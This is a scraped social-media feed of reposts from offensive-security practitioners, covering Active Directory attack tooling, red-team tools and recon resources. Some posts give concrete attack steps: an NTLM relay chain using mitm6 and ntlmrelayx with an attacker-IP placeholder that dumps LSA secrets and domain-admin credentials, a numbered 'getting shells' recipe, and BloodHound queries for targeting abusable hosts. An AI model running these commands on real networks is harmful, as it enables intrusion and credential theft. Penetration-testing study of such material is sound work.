yourDomainAdmin's profile picture.

Your Domain Admin

@yourDomainAdmin

Bloomberg is looking for product security engineers, appsec engineers, security architects. VISA sponsorship. DM if interested.


Your Domain Admin reposted

Devs watching QA test the product


Your Domain Admin reposted

Good wordlists are so important when discovering content on an asset. At @assetnote, we've built a wordlists site that updates itself on a monthly basis. For added value, we've included some of our best wordlists that we've manually collected too. wordlists.assetnote.io


Your Domain Admin reposted

I don't think that most people use Amass effectively, or understand how powerful it is. Here's how I personally use it. medium.com/@hakluke/haklu…


Your Domain Admin reposted

Here are the slides for The Bug Hunter's Methodology v4 Recon edition. Enjoy! drive.google.com/file/d/1aG_qqR…

Jhaddix's tweet image. Here are the  slides for The Bug Hunter's Methodology v4 Recon edition. Enjoy!  

drive.google.com/file/d/1aG_qqR…

Your Domain Admin reposted

Find all the users with the same name that belong to different domains: MATCH (u:User),(b:User) WHERE split(u.name, '@')[0] = split(b.name,'@')[0] AND u.domain <> b.domain AND toint(split(u.objectid, '-')[7]) > 1000 RETURN


Your Domain Admin reposted

#ActiveDirectory cross-domain and cross-forest duplicate password discovery and offline password hash comparison against HaveIBeenPwned is now possible with #DSInternals 4.2. github.com/MichaelGrafnet… Thanks @alexseigler.

MGrafnetter's tweet image. #ActiveDirectory cross-domain and cross-forest duplicate password discovery and offline password hash comparison against HaveIBeenPwned is now possible with #DSInternals 4.2. github.com/MichaelGrafnet…
Thanks @alexseigler.

Your Domain Admin reposted

CVE-2020-0688: REMOTE CODE EXECUTION ON MICROSOFT EXCHANGE SERVER THROUGH FIXED CRYPTOGRAPHIC KEYS - RCE with system privileges on all exchange server 😱 #infosec #pentest #redteam thezdi.com/blog/2020/2/24…


Your Domain Admin reposted

#BloodHound 3.0 is here! BloodHound: bit.ly/GetBloodHound Blog: bit.ly/3bu3chl Webinar deck: bit.ly/3837gTx Webinar recording coming soon #BloodHound 3.0 shirt: (all profits go to @MDAorg) customink.com/fundraising/th…

_wald0's tweet image. #BloodHound 3.0 is here!

BloodHound: bit.ly/GetBloodHound
Blog: bit.ly/3bu3chl
Webinar deck: bit.ly/3837gTx
Webinar recording coming soon

#BloodHound 3.0 shirt: (all profits go to @MDAorg)

customink.com/fundraising/th…

Your Domain Admin reposted

Getting shells with network-access only in <15 minutes: 1. Generate smb relay list with crackmapexec 2. Set up ntlmrelayx with smb2support and -socks 3. Fire up responder + bettercap (arp,dns+dhcpv6 spoofing) 4. ntlmrelayx sessions can be used with atexec and smbexec 5. Related:


Your Domain Admin reposted

Regex cheatsheet for the haters : github.com/geongeorge/i-h… cc @geongeorgek

binitamshah's tweet image. Regex cheatsheet for the haters : github.com/geongeorge/i-h… cc @geongeorgek

Your Domain Admin reposted

Join me and @CptJesus on Tuesday, February 11th as we unveil #BloodHound 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI. Register for the webinar here (recording available afterwards): specterops.zoom.us/webinar/regist…

_wald0's tweet image. Join me and @CptJesus on Tuesday, February 11th as we unveil #BloodHound 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI.

Register for the webinar here (recording available afterwards): specterops.zoom.us/webinar/regist…

Your Domain Admin reposted

New @OutflankNL tool coming soon... Zipper, a CobaltStrike tool written in C which allows you to compress files and folders from local and UNC paths. Useful for RedTeams when large files/folders need to be exfiltrated.

Cneelis's tweet image. New @OutflankNL tool coming soon...
Zipper, a CobaltStrike tool written in C which allows you to compress files and folders from local and UNC paths. Useful for RedTeams when large files/folders need to be exfiltrated.

Your Domain Admin reposted

Spray-AD, a new @OutflankNL Kerberos password spraying tool for Cobalt Strike that might come in handy when assessing Active Directory environments for weak passwords (generates event IDs 4771 instead of 4625). github.com/outflanknl/Spr…


Your Domain Admin reposted

Sharphound: "MATCH (c:Computer {unconstraineddelegation:true}) return c". Find all those boxes and use them for Print Spooler fun!


Your Domain Admin reposted

#EASY cme smb $hosts --gen-relay-list relay.txt mitm6 -i eth0 -d $domain ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt extract "Admin" hash cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa cp /root/.cme/logs/*.secrets |sort -u extract DA cred


Your Domain Admin reposted

I just pushed a new #mimikatz update, with more DPAPI & Crypto stuff inside > github.com/gentilkiwi/mim… 'cause you know, who don't love moaaaar credentials?

gentilkiwi's tweet image. I just pushed a new #mimikatz update, with more DPAPI &amp;amp; Crypto stuff inside

&amp;gt; github.com/gentilkiwi/mim…

&apos;cause you know, who don&apos;t love moaaaar credentials?

Your Domain Admin reposted

Imcat: shows images in your terminal directly with ANSI colors, resizing to the width. Super simple, super useful. github.com/stolk/imcat

angealbertini's tweet image. Imcat:
shows images in your terminal directly with ANSI colors, resizing to the width.
Super simple, super useful.
github.com/stolk/imcat

Your Domain Admin reposted

I wrote up a quick POC, RemoteViewing, to demo RDP credential theft (adapted from @0x09AL post => mdsec.co.uk/2019/11/rdpthi…) using EasyHook and Donut ☠️🖥️. More details on GitHub => github.com/FuzzySecurity/…

FuzzySec's tweet image. I wrote up a quick POC, RemoteViewing, to demo RDP credential theft (adapted from @0x09AL post =&amp;gt; mdsec.co.uk/2019/11/rdpthi…) using EasyHook and Donut ☠️🖥️. More details on GitHub =&amp;gt; github.com/FuzzySecurity/…

Your Domain Admin reposted

Red Team Operations video series with Cobalt Strike 4.0 looks *amazing*. youtube.com/playlist?list=…


Loading...

Something went wrong.


Something went wrong.